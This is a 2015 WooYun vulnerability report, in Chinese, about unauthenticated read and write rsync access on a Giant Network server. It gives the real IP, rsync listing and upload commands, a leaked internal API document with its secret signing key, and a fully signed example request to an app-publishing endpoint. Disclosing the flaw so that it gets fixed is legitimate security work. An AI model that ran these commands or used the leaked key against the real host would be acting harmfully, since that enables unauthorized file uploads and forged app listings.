当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104247

漏洞标题:巨人旗下某平台未授权访问可上传文件

相关厂商:巨人网络

漏洞作者: 路人甲

提交时间:2015-03-27 18:06

修复时间:2015-04-01 18:08

公开时间:2015-04-01 18:08

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-04-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

巨人旗下某平台未授权访问,泄露部分源码信息,可上传文件

详细说明:

rsync未授权访问,ip为222.73.30.163,含app.scloudm.com,huodong.app.scloudm.com,huodong.gamm.ztgame.com,admin.scloudm.com源码文件,可读写

rsync 222.73.30.163::fabu
drwx------ 4096 2015/01/16 10:16:31 .
-rwx------ 1113 2014/12/01 10:52:57 云测需要的接口.txt
-rwx------ 4406 2015/01/16 10:16:30 推送接口20141113.txt
drwx------ 4096 2014/12/01 10:51:59 admin
drwx------ 4096 2014/12/01 10:51:58 huodong
drwx------ 4096 2014/12/01 10:51:46 nebula_svr
drwx------ 4096 2014/12/01 10:52:57 yiiframework
cat 推送接口20141113.txt
调用接口地址:http://app.scloudm.com/app/push_app_info
请求参数如下:
id 你们这边的id
name 名称,汉字或者英文啥的
developer 开发者名称,英文或者汉字
version 版本号,不传的话默认1.0
app_updtime 时间戳,如1414576078
description 简介
screenshots 以竖线|字符分割的多个完整URL,只有一个也可以,一个就不要竖线分割了。
intro 详细介绍
upd_info 更新信息
cover_img 封面图,没有就留空
icon_img icon图标图,没有就留空
pkg_size 字节数,int
pkg_name 包名
pkg_url apk下载地址
platform 请写ANDROID
//增补参数
category 目前分类如下:
1 => 网络游戏
2 => 休闲游戏
3 => 角色扮演
4 => 体育竞速
5 => 动作射击
6 => 益智棋牌
7 => 娱乐休闲
8 => 便捷生活
9 => 常用工具
10 => 聊天社交
11 => 购物理财
12 => 其他应用
请直接传int数字。
credit_reward 下载送积分,默认为0,int型
fake_downloads 假的下载次数,默认0. 给用户展示的下载数就是这个数字加上真实的下载数。
extra_mark 默认为空,可以为以下值:
firstpub => 首测
hot => 热门
recommend => 推荐
lottery => 活动
//增补参数结束
sign 签名
//12月3日需求: credit_reward fake_downloads extra_mark 三个参数无效。
签名规则:按照上面字段,进行字典序排序,例如以下数据
id => 123
name => 测试名称
developer => 巨人
version => v1.0.0
app_updtime => 1414576078
description => 简介,测试数据
screenshots
intro => 详细介绍,测试数据
upd_info => 更新1.0正式版,更多新功能 ,修复bug,iphone6Plus适配
cover_img =>
icon_img => http://xxxxxxx
pkg_size => 12354454222
pkg_name => com.ztgame.juren
pkg_url => http://www.ztgame.com/releasexxx
platform => IOS
category => 1
排序后应该是
[app_updtime] => 1414576078
[category] => 1
[cover_img] =>
[description] => 简介,测试数据
[developer] => 巨人
[icon_img] => http://xxxxxxx
[id] => 123
[intro] => 详细介绍,测试数据
[name] => 测试名称
[pkg_name] => com.ztgame.juren
[pkg_size] => 12354454222
[pkg_url] => http://www.ztgame.com/releasexxx
[platform] => IOS
[screenshots] =>
[upd_info] => 更新1.0正式版,更多新功能 ,修复bug,iphone6Plus适配
[version] => v1.0.0
然后将值拼接起来,
14145760781简介,测试数据巨人http://xxxxxxx123详细介绍,测试数据测试名称com.ztgame.juren12354454222http://www.ztgame.com/releasexxxIOS更新1.0正式版,更多新功能 ,修复bug,iphone6Plus适配v1.0.0
加上KEY RsiWoDzPFFon
14145760781简介,测试数据巨人http://xxxxxxx123详细介绍,测试数据测试名称com.ztgame.juren12354454222http://www.ztgame.com/releasexxxIOS更新1.0正式版,更多新功能 ,修复bug,iphone6Plus适配v1.0.0RsiWoDzPFFon
进行MD5,得到 6e616467a1273b30ac29346466366475
6e616467a1273b30ac29346466366475 就是加密结果。
注意所有数据仅在传输时需要urlencode,加密时不涉及urlencode。
所有数据请使用UTF8.
一个完整请求示例:
http://app.scloudm.com/app/push_app_info?app_updtime=1414576078&category=1&cover_img=&description=%E7%AE%80%E4%BB%8B%EF%BC%8C%E6%B5%8B%E8%AF%95%E6%95%B0%E6%8D%AE&developer=%E5%B7%A8%E4%BA%BA&icon_img=http%3A%2F%2Fxxxxxxx&id=123&intro=%E8%AF%A6%E7%BB%86%E4%BB%8B%E7%BB%8D%EF%BC%8C%E6%B5%8B%E8%AF%95%E6%95%B0%E6%8D%AE&name=%E6%B5%8B%E8%AF%95%E5%90%8D%E7%A7%B0&pkg_name=com.ztgame.juren&pkg_size=12354454222&pkg_url=http%3A%2F%2Fwww.ztgame.com%2Freleasexxx&platform=IOS&screenshots=&upd_info=%E6%9B%B4%E6%96%B01.0%E6%AD%A3%E5%BC%8F%E7%89%88%EF%BC%8C%E6%9B%B4%E5%A4%9A%E6%96%B0%E5%8A%9F%E8%83%BD+%EF%BC%8C%E4%BF%AE%E5%A4%8Dbug%EF%BC%8Ciphone6Plus%E9%80%82%E9%85%8D&version=v1.0.0&sign=6e616467a1273b30ac29346466366475
可以GET或者POST,成功会返回个ok。
App下线接口
http://app.scloudm.com/app/push_app_shutdown
参数:
id 你们这边的id
ts 时间戳,类似1417580590的UNIX时间戳
sign 签名规则与前一个接口完全相同。
签名正确则APP下线。


平台介绍:http://www.scloudm.com/aboutus.php

scloudm1.png


可上传文件:

rsync wooyun.txt 222.73.30.163::fabu/


scloudm2.png

漏洞证明:

如上

修复方案:

添加访问权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-01 18:08

厂商回复:

最新状态:

暂无